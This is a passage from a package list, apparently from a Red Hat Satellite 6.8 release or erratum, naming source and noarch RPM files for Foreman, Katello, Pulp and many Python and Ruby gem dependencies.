npygobject3-3.28.3-2.el7sat.src.rpm\npython-aiohttp-3.6.2-4.el7ar.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-async-timeout-3.0.1-2.el7ar.src.rpm\npython-attrs-19.3.0-3.el7ar.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-chardet-3.0.4-10.el7ar.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-dateutil-2.8.1-2.el7ar.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-idna-2.4-2.el7ar.src.rpm\npython-idna-ssl-1.1.0-2.el7ar.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rpm\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-multidict-4.7.4-2.el7ar.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-prometheus-client-0.7.1-2.el7ar.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-receptor-satellite-1.2.0-1.el7sat.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-six-1.11.0-8.el7ar.src.rpm\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-typing-extensions-3.7.4.1-2.el7ar.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-yarl-1.4.2-2.el7ar.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nreceptor-0.6.3-1.el7ar.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrh-postgresql12-postgresql-evr-0.0.2-1.el7sat.src.rpm\nrhel8-kickstart-setup-0.0.2-1.el7sat.src.rpm\nrubygem-facter-2.4.1-2.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-foreman_scap_client-0.4.6-1.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nrubygem-passenger-4.0.18-24.el7sat.src.rpm\nrubygem-rack-1.6.12-1.el7sat.src.rpm\nrubygem-rake-0.9.2.2-41.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-actioncable-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailer-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionpack-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actiontext-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionview-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activejob-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activemodel-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-import-1.0.0-6.el7sat.src.rpm\ntfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.src.rpm\ntfm-rubygem-activestorage-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activesupport-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-addressable-2.6.0-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-amazing_print-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ancestry-3.0.7-1.el7sat.src.rpm\ntfm-rubygem-anemone-0.7.2-22.el7sat.src.rpm\ntfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-bindings-0.3.0-1.el7sat.src.rpm\ntfm-rubygem-apipie-dsl-2.2.2-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-apipie-rails-0.5.17-3.el7sat.src.rpm\ntfm-rubygem-audited-4.9.0-3.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.src.rpm\ntfm-rubygem-bcrypt-3.1.12-1.el7sat.src.rpm\ntfm-rubygem-builder-3.2.4-1.el7sat.src.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm\ntfm-rubygem-coffee-rails-5.0.0-1.el7sat.src.rpm\ntfm-rubygem-coffee-script-2.4.1-4.el7sat.src.rpm\ntfm-rubygem-coffee-script-source-1.12.2-4.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm\ntfm-rubygem-connection_pool-2.2.2-2.el7sat.src.rpm\ntfm-rubygem-crass-1.0.6-1.el7sat.src.rpm\ntfm-rubygem-css_parser-1.4.7-3.el7sat.src.rpm\ntfm-rubygem-daemons-1.2.3-7.el7sat.src.rpm\ntfm-rubygem-deacon-1.0.0-4.el7sat.src.rpm\ntfm-rubygem-declarative-0.0.10-1.el7sat.src.rpm\ntfm-rubygem-declarative-option-0.1.0-1.el7sat.src.rpm\ntfm-rubygem-deep_cloneable-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-deface-1.5.3-2.el7sat.src.rpm\ntfm-rubygem-diffy-3.0.1-6.el7sat.src.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-erubi-1.9.0-1.el7sat.src.rpm\ntfm-rubygem-excon-0.58.0-3.el7sat.src.rpm\ntfm-rubygem-execjs-2.7.0-4.el7sat.src.rpm\ntfm-rubygem-facter-2.4.0-6.el7sat.src.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm\ntfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.src.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm\ntfm-rubygem-fast_gettext-1.4.1-3.el7sat.src.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm\ntfm-rubygem-fog-aws-3.6.5-1.el7sat.src.rpm\ntfm-rubygem-fog-core-2.1.0-3.el7sat.src.rpm\ntfm-rubygem-fog-google-1.8.2-1.el7sat.src.rpm\ntfm-rubygem-fog-json-1.2.0-3.el7sat.src.rpm\ntfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.src.rpm\ntfm-rubygem-fog-libvirt-0.7.0-1.el7sat.src.rpm\ntfm-rubygem-fog-openstack-1.0.8-2.el7sat.src.rpm\ntfm-rubygem-fog-ovirt-1.2.5-1.el7sat.src.rpm\ntfm-rubygem-fog-vsphere-3.3.1-1.el7sat.src.rpm\ntfm-rubygem-fog-xml-0.1.2-8.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible-5.1.3-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_discovery-16.1.2-1.el7sat.src.rpm\ntfm-rubygem-foreman_hooks-0.3.16-2.el7sat.src.rpm\ntfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_leapp-0.1.6-1.el7sat.src.rpm\ntfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.src.rpm\ntfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.src.rpm\ntfm-rubygem-formatador-0.2.1-11.el7sat.src.rpm\ntfm-rubygem-friendly_id-5.3.0-1.el7sat.src.rpm\ntfm-rubygem-fx-0.5.0-1.el7sat.src.rpm\ntfm-rubygem-get_process_mem-0.2.1-3.el7sat.src.rpm\ntfm-rubygem-gettext-3.1.4-10.el7sat.src.rpm\ntfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.src.rpm\ntfm-rubygem-git-1.5.0-1.el7sat.src.rpm\ntfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.src.rpm\ntfm-rubygem-globalid-0.4.2-1.el7sat.src.rpm\ntfm-rubygem-google-api-client-0.23.9-3.el7sat.src.rpm\ntfm-rubygem-googleauth-0.6.7-3.el7sat.src.rpm\ntfm-rubygem-graphql-1.8.14-1.el7sat.src.rpm\ntfm-rubygem-graphql-batch-0.3.10-1.el7sat.src.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm\ntfm-rubygem-hammer_cli-2.1.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.src.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.src.rpm\ntfm-rubygem-http-3.3.0-1.el7sat.src.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm\ntfm-rubygem-http-form_data-2.1.1-1.el7sat.src.rpm\ntfm-rubygem-http_parser.rb-0.6.0-1.el7sat.src.rpm\ntfm-rubygem-httpclient-2.8.3-1.el7sat.src.rpm\ntfm-rubygem-i18n-1.8.2-1.el7sat.src.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-ipaddress-0.8.0-11.el7sat.src.rpm\ntfm-rubygem-jgrep-1.3.3-12.el7sat.src.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm\ntfm-rubygem-katello-3.16.0.11-1.el7sat.src.rpm\ntfm-rubygem-kubeclient-4.3.0-1.el7sat.src.rpm\ntfm-rubygem-ldap_fluff-0.4.7-5.el7sat.src.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm\ntfm-rubygem-locale-2.0.9-13.el7sat.src.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.src.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm\ntfm-rubygem-loofah-2.4.0-1.el7sat.src.rpm\ntfm-rubygem-mail-2.7.1-1.el7sat.src.rpm\ntfm-rubygem-marcel-0.3.3-1.el7sat.src.rpm\ntfm-rubygem-memoist-0.16.0-1.el7sat.src.rpm\ntfm-rubygem-method_source-0.9.2-2.el7sat.src.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm\ntfm-rubygem-mimemagic-0.3.5-1.el7sat.src.rpm\ntfm-rubygem-mini_mime-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-mini_portile2-2.4.0-1.el7sat.src.rpm\ntfm-rubygem-ms_rest-0.7.4-2.el7sat.src.rpm\ntfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.src.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm\ntfm-rubygem-net-ldap-0.16.1-1.el7sat.src.rpm\ntfm-rubygem-net-ping-2.0.1-3.el7sat.src.rpm\ntfm-rubygem-net-scp-1.2.1-3.el7sat.src.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-nio4r-2.5.2-2.el7sat.src.rpm\ntfm-rubygem-nokogiri-1.10.9-1.el7sat.src.rpm\ntfm-rubygem-oauth-0.5.4-3.el7sat.src.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm\ntfm-rubygem-optimist-3.0.0-1.el7sat.src.rpm\ntfm-rubygem-os-1.0.0-1.el7sat.src.rpm\ntfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.src.rpm\ntfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.src.rpm\ntfm-rubygem-parse-cron-0.1.4-4.el7sat.src.rpm\ntfm-rubygem-passenger-4.0.18-26.el7sat.src.rpm\ntfm-rubygem-pg-1.1.4-2.el7sat.src.rpm\ntfm-rubygem-polyglot-0.3.5-3.el7sat.src.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm\ntfm-rubygem-prometheus-client-1.0.0-1.el7sat.src.rpm\ntfm-rubygem-promise.rb-0.7.4-1.el7sat.src.rpm\ntfm-rubygem-public_suffix-3.0.3-1.el7sat.src.rpm\ntfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.src.rpm\ntfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.src.rpm\ntfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.src.rpm\ntfm-rubygem-pulp_container_client-1.4.1-1.el7sat.src.rpm\ntfm-rubygem-pulp_file_client-1.0.1-1.el7sat.src.rpm\ntfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.src.rpm\ntfm-rubygem-pulpcore_client-3.4.1-1.el7sat.src.rpm\ntfm-rubygem-puma-4.3.3-4.el7sat.src.rpm\ntfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.src.rpm\ntfm-rubygem-quantile-0.2.0-3.el7sat.src.rpm\ntfm-rubygem-rabl-0.14.3-1.el7sat.src.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.src.rpm\ntfm-rubygem-rack-cors-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-rack-jsonp-1.3.1-9.el7sat.src.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-rack-test-1.1.0-4.el7sat.src.rpm\ntfm-rubygem-rails-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.src.rpm\ntfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-rails-i18n-6.0.0-2.el7sat.src.rpm\ntfm-rubygem-railties-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-rainbow-2.2.1-5.el7sat.src.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm\ntfm-rubygem-rbovirt-0.1.7-4.el7sat.src.rpm\ntfm-rubygem-rbvmomi-2.2.0-3.el7sat.src.rpm\ntfm-rubygem-record_tag_helper-1.0.1-3.el7sat.src.rpm\ntfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-redhat_access-2.2.18-1.el7sat.src.rpm\ntfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.src.rpm\ntfm-rubygem-redis-4.1.2-2.el7sat.src.rpm\ntfm-rubygem-representable-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-responders-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm\ntfm-rubygem-retriable-3.1.2-1.el7sat.src.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm\ntfm-rubygem-roadie-3.4.0-3.el7sat.src.rpm\ntfm-rubygem-roadie-rails-2.1.1-2.el7sat.src.rpm\ntfm-rubygem-robotex-1.0.0-21.el7sat.src.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm\ntfm-rubygem-ruby2ruby-2.4.2-3.el7sat.src.rpm\ntfm-rubygem-ruby_parser-3.10.1-2.el7sat.src.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm\ntfm-rubygem-runcible-2.13.0-2.el7sat.src.rpm\ntfm-rubygem-safemode-1.3.5-2.el7sat.src.rpm\ntfm-rubygem-scoped_search-4.1.9-1.el7sat.src.rpm\ntfm-rubygem-secure_headers-6.3.0-2.el7sat.src.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm\ntfm-rubygem-sexp_processor-4.10.0-5.el7sat.src.rpm\ntfm-rubygem-sidekiq-5.2.7-3.el7sat.src.rpm\ntfm-rubygem-signet-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm\ntfm-rubygem-sprockets-3.7.2-6.el7sat.src.rpm\ntfm-rubygem-sprockets-rails-3.2.1-6.el7sat.src.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm\ntfm-rubygem-sshkey-1.9.0-3.el7sat.src.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm\ntfm-rubygem-stomp-1.4.9-1.el7sat.src.rpm\ntfm-rubygem-text-1.3.0-7.el7sat.src.rpm\ntfm-rubygem-thor-1.0.1-2.el7sat.src.rpm\ntfm-rubygem-thread_safe-0.3.6-5.el7sat.src.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm\ntfm-rubygem-timeliness-0.3.10-1.el7sat.src.rpm\ntfm-rubygem-tzinfo-1.2.6-1.el7sat.src.rpm\ntfm-rubygem-uber-0.1.0-1.el7sat.src.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.src.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm\ntfm-rubygem-unicode-0.4.4.4-1.el7sat.src.rpm\ntfm-rubygem-unicode-display_width-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.src.rpm\ntfm-rubygem-webpack-rails-0.9.8-6.el7sat.src.rpm\ntfm-rubygem-websocket-driver-0.7.1-1.el7sat.src.rpm\ntfm-rubygem-websocket-extensions-0.1.5-1.el7sat.src.rpm\ntfm-rubygem-will_paginate-3.1.7-3.el7sat.src.rpm\ntfm-rubygem-x-editable-rails-1.5.5-5.el7sat.src.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm\ntfm-rubygem-zeitwerk-2.2.2-1.el7sat.src.rpm\n\nnoarch:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm\nansible-runner-1.4.6-1.el7ar.noarch.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm\ncandlepin-3.1.21-1.el7sat.noarch.rpm\ncandlepin-selinux-3.1.21-1.el7sat.noarch.rpm\ncrane-selinux-3.4.0-1.el7sat.noarch.rpm\nforeman-2.1.2.19-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm\nforeman-cli-2.1.2.19-1.el7sat.noarch.rpm\nforeman-debug-2.1.2.19-1.el7sat.noarch.rpm\nforeman-discovery-image-3.6.7-1.el7sat.noarch.rpm\nforeman-dynflow-sidekiq-2.1.2.19-1.el7sat.noarch.rpm\nforeman-ec2-2.1.2.19-1.el7sat.noarch.rpm\nforeman-gce-2.1.2.19-1.el7sat.noarch.rpm\nforeman-installer-2.1.2.8-1.el7sat.noarch.rpm\nforeman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm\nforeman-journald-2.1.2.19-1.el7sat.noarch.rpm\nforeman-libvirt-2.1.2.19-1.el7sat.noarch.rpm\nforeman-openstack-2.1.2.19-1.el7sat.noarch.rpm\nforeman-ovirt-2.1.2.19-1.el7sat.noarch.rpm\nforeman-postgresql-2.1.2.19-1.el7sat.noarch.rpm\nforeman-proxy-2.1.2-2.el7sat.noarch.rpm\nforeman-proxy-content-3.16.0-1.el7sat.noarch.rpm\nforeman-proxy-journald-2.1.2-2.el7sat.noarch.rpm\nforeman-selinux-2.1.2.3-1.el7sat.noarch.rpm\nforeman-service-2.1.2.19-1.el7sat.noarch.rpm\nforeman-telemetry-2.1.2.19-1.el7sat.noarch.rpm\nforeman-vmware-2.1.2.19-1.el7sat.noarch.rpm\nkatello-3.16.0-1.el7sat.noarch.rpm\nkatello-certs-tools-2.7.1-1.el7sat.noarch.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm\nkatello-common-3.16.0-1.el7sat.noarch.rpm\nkatello-debug-3.16.0-1.el7sat.noarch.rpm\nkatello-selinux-3.4.0-1.el7sat.noarch.rpm\nkeycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm\nkobo-0.5.1-1.el7sat.noarch.rpm\npulp-admin-client-2.21.3-1.el7sat.noarch.rpm\npulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm\npulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm\npulp-katello-1.0.3-1.el7sat.noarch.rpm\npulp-maintenance-2.21.3-1.el7sat.noarch.rpm\npulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm\npulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm\npulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-tools-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-selinux-2.21.3-1.el7sat.noarch.rpm\npulp-server-2.21.3-1.el7sat.noarch.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm\npuppetserver-6.13.0-1.el7sat.noarch.rpm\npython-blinker-1.3-2.el7sat.noarch.rpm\npython-gnupg-0.3.7-1.el7ui.noarch.rpm\npython-gofer-2.12.5-7.el7sat.noarch.rpm\npython-gofer-qpid-2.12.5-7.el7sat.noarch.rpm\npython-kid-0.9.6-11.el7sat.noarch.rpm\npython-mongoengine-0.10.5-2.el7sat.noarch.rpm\npython-nectar-1.6.2-1.el7sat.noarch.rpm\npython-oauth2-1.5.211-8.el7sat.noarch.rpm\npython-pulp-bindings-2.21.3-1.el7sat.noarch.rpm\npython-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-common-2.21.3-1.el7sat.noarch.rpm\npython-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm\npython-pulp-integrity-2.21.3-2.el7sat.noarch.rpm\npython-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm\npython-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm\npython-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm\npython-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-streamer-2.21.3-1.el7sat.noarch.rpm\npython-qpid-1.35.0-5.el7.noarch.rpm\npython-semantic_version-2.2.0-6.el7sat.noarch.rpm\npython2-amqp-2.2.2-5.el7sat.noarch.rpm\npython2-ansible-runner-1.4.6-1.el7ar.noarch.rpm\npython2-anyjson-0.3.3-11.el7sat.noarch.rpm\npython2-apypie-0.2.2-1.el7sat.noarch.rpm\npython2-celery-4.0.2-9.el7sat.noarch.rpm\npython2-click-6.7-9.el7sat.noarch.rpm\npython2-crane-3.3.1-9.el7sat.noarch.rpm\npython2-daemon-2.1.2-7.el7at.noarch.rpm\npython2-django-1.11.29-1.el7sat.noarch.rpm\npython2-flask-0.12.2-4.el7sat.noarch.rpm\npython2-future-0.16.0-11.el7sat.noarch.rpm\npython2-isodate-0.5.4-12.el7sat.noarch.rpm\npython2-itsdangerous-0.24-15.el7sat.noarch.rpm\npython2-jinja2-2.10-10.el7sat.noarch.rpm\npython2-jmespath-0.9.0-6.el7_7.noarch.rpm\npython2-keycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm\npython2-kombu-4.0.2-13.el7sat.noarch.rpm\npython2-lockfile-0.11.0-10.el7ar.noarch.rpm\npython2-okaara-1.0.37-2.el7sat.noarch.rpm\npython2-pexpect-4.6-1.el7at.noarch.rpm\npython2-ptyprocess-0.5.2-3.el7at.noarch.rpm\npython2-vine-1.1.3-6.el7sat.noarch.rpm\npython2-werkzeug-0.12.2-5.el7sat.noarch.rpm\npython3-async-timeout-3.0.1-2.el7ar.noarch.rpm\npython3-attrs-19.3.0-3.el7ar.noarch.rpm\npython3-chardet-3.0.4-10.el7ar.noarch.rpm\npython3-dateutil-2.8.1-2.el7ar.noarch.rpm\npython3-idna-2.4-2.el7ar.noarch.rpm\npython3-idna-ssl-1.1.0-2.el7ar.noarch.rpm\npython3-prometheus-client-0.7.1-2.el7ar.noarch.rpm\npython3-recep